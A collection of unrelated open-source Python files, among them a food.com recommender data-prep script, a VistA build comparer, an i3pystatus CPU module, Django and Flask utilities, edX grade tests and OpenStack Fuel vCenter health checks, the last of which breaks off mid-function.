def foodcom_GenerateStatsDS():
global next_free_id
foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds', 'Data\\foodcom_ds', False, False, False)
splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, 0, 0, 'foodcom_ds')
splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_USER, 0, 'foodcom_ds2')
splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_STD_USER, 0, 'foodcom_ds3')
splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, 0, AVG_ITEM, 'foodcom_ds4')
splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, 0, AVG_STD_ITEM, 'foodcom_ds5')
splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds6')
splitKFoldSave('Data\\', 'foodcom_ds', next_free_id, 5, AVG_STD_USER, AVG_STD_ITEM, 'foodcom_ds7')
foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds8', 'Data\\foodcom_ds8', True, False, False)
splitKFoldSave('Data\\', 'foodcom_ds8', next_free_id, 5, 0, 0, 'foodcom_ds8')
splitKFoldSave('Data\\', 'foodcom_ds8', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds11')
foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds9', 'Data\\foodcom_ds9', True, True, False)
splitKFoldSave('Data\\', 'foodcom_ds9', next_free_id, 5, 0, 0, 'foodcom_ds9')
splitKFoldSave('Data\\', 'foodcom_ds9', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds12')
foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds10', 'Data\\foodcom_ds10', True, True, True)
splitKFoldSave('Data\\', 'foodcom_ds10', next_free_id, 5, 0, 0, 'foodcom_ds10')
splitKFoldSave('Data\\', 'foodcom_ds10', next_free_id, 5, AVG_USER, AVG_ITEM, 'foodcom_ds13')
foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds14', 'Data\\foodcom_ds14', False, True, False)
splitKFoldSave('Data\\', 'foodcom_ds14', next_free_id, 5, 0, 0, 'foodcom_ds14')
splitKFoldSave('Data\\', 'foodcom_ds14', next_free_id, 5, 1, 1, 'foodcom_ds16')
foodcom_CsvtoLibsvm('Data\\pre_foodcom_ds15', 'Data\\foodcom_ds15', False, False, True)
splitKFoldSave('Data\\', 'foodcom_ds15', next_free_id, 5, 0, 0, 'foodcom_ds15')
splitKFoldSave('Data\\', 'foodcom_ds15', next_free_id, 5, 1, 1, 'foodcom_ds17')
#foodcom_CutSave('Data\\foodcom.txt', 231355)
print 'Remove all the untrustable users and items (with less than 4 assotiated rating events)'
foodcom_QualityFilter('Data\\foodcom.txt', 'Data\\pre_foodcom_ds', 4, 4)
'''
print 'Generate base datasets'
foodcom_GenerateBaseDS('Data\\pre_foodcom_ds', foodcom_LoadData('Data\\foodcom_ds8', 'Data\\foodcom_ds14', 'Data\\foodcom_ds15'), 'Data\\foodcom_ds_complete')
print 'Generate feature ids'
foodcom_GenerateFeatureIds('Data\\foodcom_ds_complete')
print 'Next free id:' + str(next_free_id)
print 'Generate statistics datasets (with average and standard deviation'
foodcom_GenerateStatsDS()
''' | ruifpmaia/foodcontextawarefactmach | rfmConsoleApplication/rfmConsoleApplication/Tools/foodcom_prepare.py | Python | gpl-2.0 | 21,967 |
#
## VOLDEMORT (VDM) VistA Comparer
#
# (c) 2012 Caregraf, Ray Group Intl
# For license information, see LICENSE.TXT
#
"""
Module for retrieving, caching and analysing a VistA's builds returned by FMQL
"""
import os
import re
import urllib
import urllib2
import json
import sys
from datetime import timedelta, datetime
import logging
import operator
from collections import OrderedDict, defaultdict
from copies.fmqlCacher import FMQLDescribeResult
__all__ = ['VistaBuilds']
class VistaBuilds(object):
"""
Lynchpin for most VistA System data reporting.
TODO:
- test install for files now in here ...
- important: ex/ files like 19620.1 showing up in listFiles due to COMPARE DSIR 5.2
which though loaded was never installed
- consider pass in names NOT to load/index ie/ if in Base, why reload from remote system. ie/ depth not needed if date distrib equal.
- pkg tagger (list of regexps - [(r'xx', PKGNAME)] ie build pkg tagger
- "package name or prefix"
- will use (uri, label) form from Cache update
- tie into Stations and Conventions for naming Class 3 builds
- use Cacher filters like "yes/no" -> true/false, default values etc. ie. sparce hard to record on
- defaults in Comparer ... better done in here
- handle cnodes generically ie/ if there properly then deref file by name into the desired label for an index. Make the indexes into one dictionary ie/ self.__indexes
- consider link into (static) release notes
- current version grabs everything about every build into a Cache. Instead
grab select builds only, one by one. ex/ grab only those not in base.
"""
def __init__(self, vistaLabel, fmqlCacher):
self.vistaLabel = vistaLabel
self.__fmqlCacher = fmqlCacher
self.__indexNCleanBuilds()
def __str__(self):
return "Builds of %s" % self.vistaLabel
def getNoSpecificValues(self):
"""
How many datapoints are available <=> number of fields in indexed entries
TODO: expand for tabulation - show file/field=#
"""
return self.__noSpecificValues
def listPackages(self):
"""
TODO: may just move Package file in here ie/ get shallow 9_4 and nix all the other Package file logic (or leave for Routines and later)
"""
return [(packageId, self.__packages[packageId]) for packageId in sorted(self.__packages.keys(), key=lambda x: int(x.split("-")[1]))]
def getBuildsOfPackage(self, packageName):
return self.__buildsByPackageName[packageName]
def listBuilds(self, installedOnly=True):
"""
Returns list of build names in Build file order if all builds requested and
in active/installed order if ask for 'installedOnly'
"""
if installedOnly:
return list(self.__buildAboutsInstalled)
return list(self.__buildAbouts)
def describeBuild(self, buildName):
"""
Fields of interest:
- vse:ien
- [type] "SINGLE PACKAGE", "MULTI-PACKAGE", "GLOBAL PACKAGE"
- [track_package_nationally]
- [date_distributed]
- [package_file_link]
- [description_of_enhancements]
Others are less interesting.
"""
return self.__buildAbouts[buildName]
def getFiles(self, installedOnly=True):
"""
All files created/updated in the build system with list of builds effecting them
Precise Query: DESCRIBE 9_64 IN %s CSTOP 1000
"""
fls = defaultdict(list)
for buildName, buildFiles in self.__buildFiles.items():
if installedOnly and buildName not in self.__buildAboutsInstalled:
continue
for buildFile in buildFiles:
# TODO: remove once FOIA GOLD has this stuff (will go from Cache too)
if float(buildFile["vse:file_id"]) < 1.1:
continue
fls[buildFile["vse:file_id"]].append(buildName)
return fls
def describeBuildFiles(self, buildName):
"""
From Build (9.6)/File (9.64)
Fields:
vse:file_id (from 'file')
data_comes_with_file
send_full_or_partial_dd
update_the_data_dictionary
sites_data: overwrite etc.
... others less interesting
TODO: need to preserve order of builds (out of order now)
"""
# file fields with: set(field for fis in self.__buildFiles.values() for fi in fis for field in fi)
return [] if buildName not in self.__buildFiles else self.__buildFiles[buildName]
def getGlobals(self):
pass
def describeBuildGlobals(self, buildName):
"""
TODO: may remove as doesn't seem to be in any builds (ala GLOBAL BUILD option in 'type')
"""
return [] if buildName not in self.__buildGlobals else self.__buildGlobals[buildName]
def getRoutines(self):
pass
def describeBuildRoutines(self, buildName):
"""
From Build Component (9.67)/build component=Build (.01=1-9.8)
TODO: issue of no "action". Assume "send to site" (added) vs "delete at site"?
Includes Delete
Precise Query: DESCRIBE 9_67 IN %s FILTER(.01=\"1-9.8\") CSTOP 1000
"""
return [] if buildName not in self.__buildRoutines else self.__buildRoutines[buildName]
def listInstallationRoutines(self, buildName):
"""
TODO: may add to routines list and support a filter.
As opposed to routines in the build, these are routines that run along with the build process.
- comments: "This routine will be run as part of the post-install for patch"
- some early builds don't name their routines -- A4A7KILL in A4A7*1.01*11 is clearly a build routine. Asked to run manually.
- Some seem to have be batch culled in FOIA (RPMS still has "DG272PT*" is in build DG*5.3*272)
- one can call others: in RPMS where GMRAY18 is ... it calls ^GMRAY18A,^GMRAY18B,^GMRAY18C,^GMRAY18D,^GMRAY18E,^GMRAY18F,^GMRAY18G and ^GMRAY18I,^GMRAY18J,^GMRAY18K,^GMRAY18L,^GMRAY18M,^GMRAY18N,^GMRAY18P.
"""
pass
def getRPCs(self):
pass
def describeBuildRPCs(self, buildName):
"""
From Build Component (9.67)/build component=Build (.01=1-8994)
TODO: still need to add to GOLD
Includes Delete
Precise Query: DESCRIBE 9_67 IN %s FILTER(.01=\"1-8994\") CSTOP 1000
"""
return [] if buildName not in self.__buildRPCs else self.__buildRPCs[buildName]
def describeBuildMultiples(self, buildName):
"""
Note that a build may contain others (multiples) and have explicit
files/kernel etc. Only makes sense in the context of a build ie/ there is
no "getMultiples" method.
"""
return [] if buildName not in self.__buildMultiples else self.__buildMultiples[buildName]
__ALL_LIMIT = 200
def __indexNCleanBuilds(self):
"""
Index and clean builds - will force caching if not already in cache
CNodes: only see ...
'required_build', u'install_questions', u'multiple_build', u'file', 'build_components', u'package_namespace_or_prefix'
but no "global"
"""
logging.info("%s: Builds - building Builds Index ..." % self.vistaLabel)
start = datetime.now()
self.__noSpecificValues = 0
# TODO: move to dict of dicts. Dynamic naming.
self.__buildAbouts = OrderedDict()
self.__buildFiles = {}
self.__buildMultiples = {}
self.__buildGlobals = {}
self.__buildRoutines = {} # from build components
self.__buildRPCs = {} # from build components
self.__buildsByPackageName = defaultdict()
self.__packages = {}
limit = 1000 if self.vistaLabel == "GOLD" else VistaBuilds.__ALL_LIMIT
for i, buildResult in enumerate(self.__fmqlCacher.describeFileEntries("9_6", limit=limit, cstop=10000)):
# logging.info("... build result %d" % i)
dr = FMQLDescribeResult(buildResult)
self.__noSpecificValues += dr.noSpecificValues()
name = buildResult["name"]["value"]
if name in self.__buildAbouts:
raise Exception("Two builds in this VistA have the same name %s - breaks assumptions" % name)
# Don't show FMQL itself
if re.match(r'CGFMQL', name):
continue
self.__buildAbouts[name] = dr.cstopped(flatten=True)
if "package_file_link" in buildResult:
packageName = buildResult["package_file_link"]["label"].split("/")[1]
self.__buildAbouts[name]["vse:package_name"] = packageName
self.__buildAbouts[name]["vse:package"] = buildResult["package_file_link"]["value"]
self.__buildsByPackageName[packageName] = name
self.__packages[buildResult["package_file_link"]["value"]] = packageName
self.__buildAbouts[name]["vse:ien"] = buildResult["uri"]["value"].split("-")[1]
self.__buildAbouts[name]["vse:status"] = "NEVER_INSTALLED" # overridden below
if "file" in dr.cnodeFields():
# catch missing 'file'. TBD: do verify version?
self.__buildFiles[name] = [cnode for cnode in dr.cnodes("file") if "file" in cnode]
# turn 1- form into straight file id. Note dd_number is optional
for fileAbout in self.__buildFiles[name]:
fileAbout["vse:file_id"] = fileAbout["file"][2:]
if "global" in dr.cnodeFields():
self.__buildGlobals[name] = [cnode for cnode in dr.cnodes("global") if "global" in cnode]
if "multiple_build" in dr.cnodeFields():
self.__buildMultiples[name] = [cnode for cnode in dr.cnodes("multiple_build") if "multiple_build" in cnode]
# TODO: required build for tracing if want to be full Build analysis framework
if "package_namespace_or_prefix" in dr.cnodeFields():
pass # may join?
# Strange structure: entry for all possibilities but only some have data
if "build_components" in dr.cnodeFields():
bcs = dr.cnodes("build_components")
for bc in bcs:
if "entries" not in bc:
continue
if bc["build_component"] == "1-8994":
self.__buildRPCs[name] = bc["entries"]
if bc["build_component"] == "1-9.8":
self.__buildRoutines[name] = bc["entries"]
continue
logging.info("%s: Indexing, cleaning (with caching) %d builds took %s" % (self.vistaLabel, len(self.__buildAbouts), datetime.now()-start))
self.__installAbouts = OrderedDict()
noInstalls = 0
for i, installResult in enumerate(self.__fmqlCacher.describeFileEntries("9_7", limit=limit, cstop=0)):
# WV has entries with no status: usually there is a follow on with data
if "status" not in installResult:
logging.error("No 'status' in install %s" % installResult["uri"]["value"])
continue
ir = FMQLDescribeResult(installResult)
self.__noSpecificValues += ir.noSpecificValues()
name = installResult["name"]["value"]
# Don't show FMQL itself
if re.match(r'CGFMQL', name):
continue
if name not in self.__installAbouts:
self.__installAbouts[name] = []
self.__installAbouts[name].append(ir.cstopped(flatten=True))
noInstalls += 1
# Finally let's go through these installs (in order), all have status
# and note various aspects of the build like if still installed, last install
# time etc.
self.__buildAboutsInstalled = OrderedDict()
for name, installInfos in self.__installAbouts.items():
if name not in self.__buildAbouts:
continue # TODO: look at this: FOIA GECS*2.0*10 (corrupt FOIA?)
for installInfo in installInfos:
if installInfo["status"] == "Install Completed":
try:
self.__buildAbouts[name]["vse:last_install_effect"] = installInfo["install_complete_time"]
except: # TODO: check this further - 0LR*5.2*156 in VAVISTA
self.__buildAbouts[name]["vse:last_install_effect"] = installInfo["install_start_time"]
self.__buildAbouts[name]["vse:status"] = "INSTALLED"
if name in self.__buildAboutsInstalled:
del self.__buildAboutsInstalled[name]
self.__buildAboutsInstalled[name] = self.__buildAbouts[name]
elif installInfo["status"] == "De-Installed":
# TODO: no obvious field for this.
self.__buildAbouts[name]["vse:last_install_effect"] = ""
self.__buildAbouts[name]["vse:status"] = "DE_INSTALLED"
# Should always be but just in case
if name in self.__buildAboutsInstalled:
del self.__buildAboutsInstalled[name]
else:
logging.error("De-installing an uninstalled build: %s" % installInfo["uri"])
logging.info("%s: Indexing, cleaning (with caching) %d builds, %d installs took %s" % (self.vistaLabel, len(self.__buildAbouts), noInstalls, datetime.now()-start))
# ######################## Module Demo ##########################
def demo():
"""
Simple Demo of this Module
Equivalent from command line:
$ python
...
>>> from copies.fmqlCacher import FMQLCacher
"""
logging.basicConfig(level=logging.INFO, format="%(message)s")
from copies.fmqlCacher import FMQLCacher
cacher = FMQLCacher("Caches")
cacher.setVista("CGVISTA", fmqlEP="http://vista.caregraf.org/fmqlEP")
cgbs = VistaBuilds("CGVISTA", cacher)
buildNames = cgbs.listBuilds()
packageNames = cgbs.listPackages()
print packageNames
print len(packageNames)
print len(buildNames)
print len(cgbs.listBuilds(False))
print "First build is: %s" % buildNames[0]
for i, buildName in enumerate(cgbs.listBuilds(True), 1):
ba = cgbs.describeBuild(buildName)
print "%d: %s - %s" % (i, buildName, ba["vse:package_name"] if "vse:package_name" in ba else "")
flsEffected = cgbs.getFiles()
for i, (fid, fi) in enumerate(flsEffected.items(), 1):
print "%d: %s - %s" % (i, fid, str(fi))
print len(list(flsEffected))
print "Number of specific values available: %d" % cgbs.getNoSpecificValues()
if __name__ == "__main__":
demo()
| VAchris/VOLDEMORT | vdm/vistaBuilds.py | Python | apache-2.0 | 15,337 |
from i3pystatus import IntervalModule
class CpuFreq(IntervalModule):
"""
class uses by default `/proc/cpuinfo` to determine the current cpu frequency
.. rubric:: Available formatters
* `{avg}` - mean from all cores in MHz `4.3f`
* `{avgg}` - mean from all cores in GHz `1.2f`
* `{coreX}` - frequency of core number `X` in MHz (format `4.3f`), where 0 <= `X` <= number of cores - 1
* `{coreXg}` - frequency of core number `X` in GHz (fromat `1.2f`), where 0 <= `X` <= number of cores - 1
"""
format = "{avgg}"
settings = (
"format",
("color", "The text color"),
("file", "override default path"),
)
file = '/proc/cpuinfo'
color = '#FFFFFF'
def createvaluesdict(self):
"""
function processes the /proc/cpuinfo file
:return: dictionary used as the full-text output for the module
"""
with open(self.file) as f:
mhz_values = [float(line.split(':')[1]) for line in f if line.startswith('cpu MHz')]
ghz_values = [value / 1000.0 for value in mhz_values]
mhz = {"core{}".format(key): "{0:4.3f}".format(value) for key, value in enumerate(mhz_values)}
ghz = {"core{}g".format(key): "{0:1.2f}".format(value) for key, value in enumerate(ghz_values)}
cdict = mhz.copy()
cdict.update(ghz)
cdict['avg'] = "{0:4.3f}".format(sum(mhz_values) / len(mhz_values))
cdict['avgg'] = "{0:1.2f}".format(sum(ghz_values) / len(ghz_values), 2)
return cdict
def run(self):
cdict = self.createvaluesdict()
self.data = cdict
self.output = {
"full_text": self.format.format(**cdict),
"color": self.color,
"format": self.format,
}
| ncoop/i3pystatus | i3pystatus/cpu_freq.py | Python | mit | 1,779 |
# Below is the interface for Iterator, which is already defined for you.
#
# class Iterator(object):
# def __init__(self, nums):
# """
# Initializes an iterator object to the beginning of a list.
# :type nums: List[int]
# """
#
# def hasNext(self):
# """
# Returns true if the iteration has more elements.
# :rtype: bool
# """
#
# def next(self):
# """
# Returns the next element in the iteration.
# :rtype: int
# """
class PeekingIterator(object):
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.iterator = iterator
self.peeked = False
self.nextEle = None
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
if not self.peeked:
self.nextEle = self.iterator.next()
self.peeked = True
return self.nextEle
def next(self):
"""
:rtype: int
"""
if self.peeked:
self.peeked = False
return self.nextEle
else:
self.nextEle = self.iterator.next()
return self.nextEle
def hasNext(self):
"""
:rtype: bool
"""
return self.iterator.hasNext() or self.peeked
# Your PeekingIterator object will be instantiated and called as such:
# iter = PeekingIterator(Iterator(nums))
# while iter.hasNext():
# val = iter.peek() # Get the next element but not advance the iterator.
# iter.next() # Should return the same value as [val].
| Jacy-Wang/MyLeetCode | PeekingIterator284.py | Python | gpl-2.0 | 1,718 |
# Generated by Django 2.0.8 on 2019-03-29 19:58
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
dependencies = [
('gestao', '0009_historicaldiligenciasimples'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('planotrabalho', '0027_auto_20190329_1650'),
]
operations = [
migrations.CreateModel(
name='HistoricalArquivoComponente2',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('arquivo', models.TextField(blank=True, max_length=100, null=True)),
('situacao', models.IntegerField(choices=[(0, 'Em preenchimento'), (1, 'Avaliando anexo'), (2, 'Concluída'), (3, 'Arquivo aprovado com ressalvas'), (4, 'Arquivo danificado'), (5, 'Arquivo incompleto'), (6, 'Arquivo incorreto')], default=0, verbose_name='Situação do Arquivo')),
('data_envio', models.DateField(default=datetime.date.today)),
('data_publicacao', models.DateField(blank=True, null=True, verbose_name='Data de Publicação do Arquivo do Componente')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('diligencia', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='gestao.DiligenciaSimples')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical arquivo componente2',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
]
| culturagovbr/sistema-nacional-cultura | planotrabalho/migrations/0028_historicalarquivocomponente2.py | Python | agpl-3.0 | 2,312 |
"""
WSGI config for arcane project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "arcane.settings")
application = get_wsgi_application()
| ArcaneStreaming/Arcane-Server | arcane/wsgi.py | Python | gpl-3.0 | 390 |
"""
Tests of the SubsectionGrade classes.
"""
from ..models import PersistentSubsectionGrade
from ..subsection_grade import CreateSubsectionGrade, ReadSubsectionGrade
from .base import GradeTestBase
from .utils import mock_get_score
class SubsectionGradeTest(GradeTestBase):
def test_create_and_read(self):
with mock_get_score(1, 2):
# Create a grade that *isn't* saved to the database
created_grade = CreateSubsectionGrade(
self.sequence,
self.course_structure,
self.subsection_grade_factory._submissions_scores,
self.subsection_grade_factory._csm_scores,
)
self.assertEqual(PersistentSubsectionGrade.objects.count(), 0)
self.assertEqual(created_grade.percent_graded, 0.5)
# save to db, and verify object is in database
created_grade.update_or_create_model(self.request.user)
self.assertEqual(PersistentSubsectionGrade.objects.count(), 1)
# read from db, and ensure output matches input
saved_model = PersistentSubsectionGrade.read_grade(
user_id=self.request.user.id,
usage_key=self.sequence.location,
)
read_grade = ReadSubsectionGrade(
self.sequence,
saved_model,
self.subsection_grade_factory
)
self.assertEqual(created_grade.url_name, read_grade.url_name)
read_grade.all_total.first_attempted = created_grade.all_total.first_attempted = None
self.assertEqual(created_grade.all_total, read_grade.all_total)
self.assertEqual(created_grade.percent_graded, 0.5)
def test_zero(self):
with mock_get_score(1, 0):
grade = CreateSubsectionGrade(
self.sequence,
self.course_structure,
self.subsection_grade_factory._submissions_scores,
self.subsection_grade_factory._csm_scores,
)
self.assertEqual(grade.percent_graded, 0.0)
| edx-solutions/edx-platform | lms/djangoapps/grades/tests/test_subsection_grade.py | Python | agpl-3.0 | 2,100 |
#!flask/bin/python
from app import create_app
app = create_app()
if __name__ == "__main__":
app.run()
| NikhilKalige/atom-website | run.py | Python | bsd-2-clause | 108 |
"""
Simple utilities.
"""
### IMPORTS
from werkzeug.contrib.cache import SimpleCache
from egas import app, db
from . import models
#__all__ = (
# 'simple_repr',
#)
### CONSTANTS & DEFINES
CACHE = SimpleCache()
CACHE_TIMEOUT = 5 * 60 # 5 minutes
### CODE ###
def simple_repr (obj, *fields):
"""
Quick-and-dirty way of making repr strings for models.
"""
field_strs = ['%s: %s' % (f, getattr (obj, f)) for f in fields]
field_bdy = '(%s)' % ', '.join (field_strs)
return '%s %s' % (obj.__class__.__name__, field_bdy)
@app.context_processor
def utility_processor():
"""
All those function you want available in templates
"""
def date_now(format="%d.m.%Y %H:%M:%S"):
""" returns the formated datetime """
return datetime.datetime.now().strftime (format)
def get_total_associations():
"""
For use in template, tracking number of records.
"""
global CACHE
val = CACHE.get ('total_associations')
if val is None:
val = db.session.query (models.Association).count()
CACHE.set ('total_associations', val, timeout=CACHE_TIMEOUT)
return val
def get_latest_news():
"""
Get the most recent news item.
"""
global CACHE
val = CACHE.get ('latest_news')
if val is None:
val = db.session.query (models.News).order_by (models.News.created_on.desc()).first()
if val:
val = {
'id': val.id,
'title': val.title,
'created_on': val.created_on,
}
CACHE.set ('latest_news', val, timeout=CACHE_TIMEOUT)
return val
def get_model_json (pk):
"""
Get a model record by key & return JSON.
"""
val = db.session.query (models.News).order_by (models.News.created_on.desc()).first()
if val:
val = {
'id': val.id,
'title': val.title,
'created_on': val.created_on,
}
return val
return dict (
date_now=date_now,
get_total_associations=get_total_associations,
get_latest_news=get_latest_news,
get_model_json=get_model_json,
)
import jinja2
@jinja2.contextfunction
def get_context(c):
return c
app.jinja_env.globals['context'] = get_context
app.jinja_env.globals['callable'] = callable
### END ###
| agapow/egas | egas/utils.py | Python | mit | 2,353 |
from django.http import HttpResponseBadRequest, HttpResponse
from .models import Device
class DeviceVerificationMiddleware(object):
def __init__(self, get_response=None):
self.get_response = get_response
def __call__(self, request):
request.device = None
if "HTTP_X_DEVICE_VERIFICATION" in request.META:
if "HTTP_X_DEVICE" in request.META:
device_id = request.META["HTTP_X_DEVICE"]
device = Device.objects.get(pk=device_id)
if device.verify_request(
request, request.META["HTTP_X_DEVICE_VERIFICATION"]):
request.device = device
else:
return HttpResponse("Device unverifiable.", status=401)
else:
return HttpResponseBadRequest("No device_id specified.")
return self.get_response(request)
| LazyHaus/API | api/middleware.py | Python | gpl-3.0 | 899 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import traceback
from fuel_health.common.utils.data_utils import rand_name
from fuel_health import nmanager
from fuel_health import test
LOG = logging.getLogger(__name__)
class TestVcenter(nmanager.NovaNetworkScenarioTest):
"""Test suit verifies:
- Instance creation
- Floating ip creation
- Instance connectivity by floating IP
"""
@classmethod
def setUpClass(cls):
super(TestVcenter, cls).setUpClass()
if cls.manager.clients_initialized:
cls.tenant_id = cls.manager._get_identity_client(
cls.config.identity.admin_username,
cls.config.identity.admin_password,
cls.config.identity.admin_tenant_name).tenant_id
cls.keypairs = {}
cls.security_groups = {}
cls.network = []
cls.servers = []
cls.floating_ips = []
def setUp(self):
super(TestVcenter, self).setUp()
self.check_clients_state()
def tearDown(self):
super(TestVcenter, self).tearDown()
if self.manager.clients_initialized:
if self.servers:
for server in self.servers:
try:
self._delete_server(server)
self.servers.remove(server)
except Exception:
LOG.debug(traceback.format_exc())
LOG.debug("Server was already deleted.")
def test_1_vcenter_create_servers(self):
"""vCenter: Launch instance
Target component: Nova
Scenario:
1. Create a new security group (if it doesn`t exist yet).
2. Create an instance using the new security group.
3. Delete instance.
Duration: 200 s.
Available since release: 2014.2-6.1
Deployment tags: use_vcenter
"""
self.check_image_exists()
if not self.security_groups:
self.security_groups[self.tenant_id] = self.verify(
25,
self._create_security_group,
1,
"Security group can not be created.",
'security group creation',
self.compute_client)
name = rand_name('ost1_test-server-smoke-')
security_groups = [self.security_groups[self.tenant_id].name]
img_name = 'TestVM-VMDK'
server = self.verify(
200,
self._create_server,
2,
"Creating instance using the new security group has failed.",
'image creation',
self.compute_client, name, security_groups, None, None, img_name
)
self.verify(30, self._delete_server, 3,
"Server can not be deleted.",
"server deletion", server)
def test_3_vcenter_check_public_instance_connectivity_from_instance(self):
"""vCenter: Check network connectivity from instance via floating IP
Target component: Nova
Scenario:
1. Create a new security group (if it doesn`t exist yet).
2. Create an instance using the new security group.
3. Create a new floating IP
4. Assign the new floating IP to the instance.
5. Check connectivity to the floating IP using ping command.
6. Check that public IP 8.8.8.8 can be pinged from instance.
7. Disassociate server floating ip.
8. Delete floating ip
9. Delete server.
Duration: 300 s.
Available since release: 2014.2-6.1
Deployment tags: nova_network, use_vcenter
"""
self.check_image_exists()
if not self.security_groups:
self.security_groups[self.tenant_id] = self.verify(
25, self._create_security_group, 1,
"Security group can not be created.",
'security group creation',
self.compute_client)
name = rand_name('ost1_test-server-smoke-')
security_groups = [self.security_groups[self.tenant_id].name]
img_name = 'TestVM-VMDK'
server = self.verify(250, self._create_server, 2,
"Server can not be created.",
"server creation",
self.compute_client, name, security_groups, None,
None, img_name)
floating_ip = self.verify(
20,
self._create_floating_ip,
3,
"Floating IP can not be created.",
'floating IP creation')
self.verify(20, self._assign_floating_ip_to_instance,
4, "Floating IP can not be assigned.",
'floating IP assignment',
self.compute_client, server, floating_ip)
self.floating_ips.append(floating_ip)
ip_address = floating_ip.ip
LOG.info('is address is {0}'.format(ip_address))
LOG.debug(ip_address)
self.verify(600, self._check_vm_connectivity, 5,
"VM connectivity doesn`t function properly.",
'VM connectivity checking', ip_address,
30, (6, 60))
self.verify(600, self._check_connectivity_from_vm,
6, ("Connectivity to 8.8.8.8 from the VM doesn`t "
"function properly."),
'public connectivity checking from VM', ip_address,
30, (6, 60))
self.verify(10, self.compute_client.servers.remove_floating_ip,
7, "Floating IP cannot be removed.",
"removing floating IP", server, floating_ip)
self.verify(10, self.compute_client.floating_ips.delete,
8, "Floating IP cannot be deleted.",
"floating IP deletion", floating_ip)
if self.floating_ips:
self.floating_ips.remove(floating_ip)
self.verify(30, self._delete_server, 9,
"Server can not be deleted. ",
"server deletion", server)
def test_2_vcenter_check_internet_connectivity_without_floatingIP(self):
"""vCenter: Check network connectivity from instance without floating \
IP
Target component: Nova
Scenario:
1. Create a new security group (if it doesn`t exist yet).
2. Create an instance using the new security group.
(if it doesn`t exist yet).
3. Check that public IP 8.8.8.8 can be pinged from instance.
4. Delete server.
Duration: 300 s.
Available since release: 2014.2-6.1
Deployment tags: nova_network, use_vcenter
"""
self.check_image_exists()
if not self.security_groups:
self.security_groups[self.tenant_id] = self.verify(
25, self._create_security_group, 1,
"Security group can not be created.",
'security group creation', self.compute_client)
name = rand_name('ost1_test-server-smoke-')
security_groups = [self.security_groups[self.tenant_id].name]
img_name = 'TestVM-VMDK'
compute = None
server = self.verify(
250, self._create_server, 2,
"Server can not be created.",
'server creation',
self.compute_client, name, security_groups, None, None, img_name)
try:
for addr in server.addresses:
if addr.startswith('novanetwork'):
instance_ip = server.addresses[addr][0]['addr']
except Exception:
LOG.debug(traceback.format_exc())
self.fail("Step 3 failed: cannot get instance details. "
"Please refer to OpenStack logs for more details.")
self.verify(400, self._check_connectivity_from_vm,
3, ("Connectivity to 8.8.8.8 from the VM doesn`t "
"function properly."),
'public connectivity checking from VM',
instance_ip, 30, (6, 30), compute)
self.verify(30, self._delete_server, 4,
"Server can not be deleted. ",
"server deletion", server)
class TestVcenterImageAction(nmanager.SmokeChecksTest):
"""Test class verifies the following:
- verify that image can be created;
- verify that instance can be booted from created image;
- verify that snapshot can be created from an instance;
- verify that instance can be booted from a snapshot.
"""
@classmethod
def setUpClass(cls):
super(TestVcenterImageAction, cls).setUpClass()
if cls.manager.clients_initialized:
cls.micro_flavors = cls.find_micro_flavor()
@classmethod
def tearDownClass(cls):
super(TestVcenterImageAction, cls).tearDownClass()
def setUp(self):
super(TestVcenterImageAction, self).setUp()
self.check_clients_state()
self.check_image_exists()
def _wait_for_server_status(self, server, status):
self.status_timeout(self.compute_client.servers,
server.id,
status)
def _wait_for_image_status(self, image_id, status):
self.status_timeout(self.compute_client.images, image_id, status)
def _wait_for_server_deletion(self, server):
def is_deletion_complete():
# Deletion testing is only required for objects whose
# existence cannot be checked via retrieval.
if isinstance(server, dict):
return True
try:
server.get()
except Exception as e:
# Clients are expected to return an exception
# called 'NotFound' if retrieval fails.
if e.__class__.__name__ == 'NotFound':
return True
self.error_msg.append(e)
LOG.debug(traceback.format_exc())
return False
# Block until resource deletion has completed or timed-out
test.call_until_true(is_deletion_complete, 10, 1)
def _boot_image(self, image_id):
if not self.micro_flavors:
self.fail("Flavor for tests was not found. Seems that "
"something is wrong with nova services.")
name = rand_name('ost1_test-image')
